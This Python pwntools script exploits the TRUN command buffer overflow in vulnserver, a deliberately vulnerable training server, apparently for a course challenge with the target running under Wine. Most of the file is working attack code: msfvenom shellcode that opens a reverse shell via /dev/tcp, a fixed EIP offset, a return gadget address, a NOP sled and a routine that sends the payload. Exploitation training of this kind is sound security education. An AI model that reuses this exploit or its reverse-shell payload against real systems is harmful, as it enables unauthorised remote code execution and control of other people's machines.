vulnserver - challenge ppt dari pak marie (f3ci)
# vulnserver is run under Wine (which is why the shellcode further down is Linux x86, not Windows)
# and debugged in winedbg with the GEF plugin enabled
from pwn import *
import string
from struct import pack
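# Exploit for vulnserver's "TRUN" command (server running under Wine).
#
# Relevant part of the handler (decompiled), kept here for reference:
#
#   else if (strncmp(RecvBuf, "TRUN ", 5) == 0) {
#       char *TrunBuf = malloc(3000);
#       memset(TrunBuf, 0, 3000);
#       for (i = 5; i < RecvBufLen; i++) {
#           if ((char)RecvBuf[i] == '.') {
#               strncpy(TrunBuf, RecvBuf, 3000);
#               Function3(TrunBuf);
#               break;
#           }
#       }
#       memset(TrunBuf, 0, 3000);
#       SendResult = send( Client, "TRUN COMPLETE\n", 14, 0 )
#
# What that means for the payload:
#   * Function3() (where the overflow happens) is only reached if the request
#     contains a '.', so the request starts with "TRUN .";
#   * the request is copied with strncpy(..., 3000): a NUL byte truncates the
#     copy (hence -b '\x00' when generating the shellcode) and only the first
#     3000 bytes ever reach Function3(), so the whole payload must fit there.
#
# The process runs under Wine, so the shellcode is *Linux* x86 and calls back
# to 127.0.0.1:12345 -- start a listener first (e.g. `nc -lvnp 12345`). Against
# a native Windows vulnserver this shellcode will not work; regenerate it with
# a windows/* msfvenom payload (and re-check bad characters).

# msfvenom -p linux/x86/exec CMD='/bin/sh -c /bin/sh -i >& /dev/tcp/127.0.0.1/12345 0>&1' -f py -v bof -b '\x00'
bof = (
    b"\xbe\xec\xf8\xef\x07\xdb\xd7\xd9\x74\x24\xf4\x5f"
    b"\x29\xc9\xb1\x17\x31\x77\x14\x03\x77\x14\x83\xc7"
    b"\x04\x0e\x0d\x85\x0c\x96\x77\x08\x75\x4e\xa5\xce"
    b"\xf0\x69\xdd\x3f\x70\x1d\x1e\x28\x59\xbf\x77\xc6"
    b"\x2c\xdc\xda\xfe\x18\x22\xdb\xfe\x49\x40\xb2\x90"
    b"\xba\xf7\x2c\x4d\xe8\x94\x8c\xa2\x90\x33\xa3\x93"
    b"\x27\xab\x1b\xc1\xae\x0b\x62\x3f\x11\x64\xfe\x5a"
    b"\x27\x55\x8a\xc7\xb7\x86\x43\x3a\x0f\xf6\x93\x14"
    b"\x5f\x28\xe5\x47\xae\x06\x36\xac\xe5\x46\x08\xf2"
    b"\x23\xb7\x68\x5d\x7f\x3e\x89\xac\xff"
)

# Filler length before the 4 padding bytes; found by fuzzing (see get_commandNotFound).
offset = 2002
# Return address: a gadget in one of vulnserver's DLLs (per the original
# author, vulnserver.exe itself only offers a `jmp eax`). Presumably a
# `jmp esp`-style gadget, since execution is expected to continue into the
# NOP sled that directly follows it -- confirm in the debugger.
RET_GADGET = 0x625011AF
# The 4 bytes right before the return-address slot, so the gadget lands on EIP.
EIP_PADDING = b"BBBB"
# strncpy(TrunBuf, RecvBuf, 3000): bytes past this are never copied.
TRUN_COPY_LIMIT = 3000


def build_payload(
    offset: int = offset,
    gadget: int = RET_GADGET,
    nop_count: int = 100,
    shellcode: bytes = bof,
) -> bytes:
    """Build the TRUN request that overwrites EIP with *gadget* and runs *shellcode*.

    Layout: ``"TRUN ."`` + ``"A" * offset`` + ``"BBBB"`` + ``gadget`` (little
    endian) + NOP sled + shellcode.

    Raises ValueError if the payload contains a NUL byte (strncpy would
    truncate it) or exceeds the 3000-byte copy limit of the handler.
    """
    payload = b"".join(
        [
            b"TRUN .",  # the '.' is required to reach Function3()
            b"A" * offset,
            EIP_PADDING,
            pack("<I", gadget),
            b"\x90" * nop_count,  # NOP sled gives the gadget some slack before the shellcode
            shellcode,
        ]
    )
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strncpy would truncate it")
    if len(payload) > TRUN_COPY_LIMIT:
        raise ValueError(
            f"payload is {len(payload)} bytes but only {TRUN_COPY_LIMIT} are copied into TrunBuf"
        )
    return payload


def main(host: str = "127.0.0.1", port: int = 9999) -> None:
    """Connect to vulnserver and deliver the payload once."""
    context.log_level = "DEBUG"  # pwntools hexdumps what is sent; handy alongside winedbg
    payload = build_payload()
    r = remote(host, port)
    try:
        r.sendline(payload)  # the appended "\n" lands after the shellcode, so it is harmless
    finally:
        r.close()


if __name__ == "__main__":
    main()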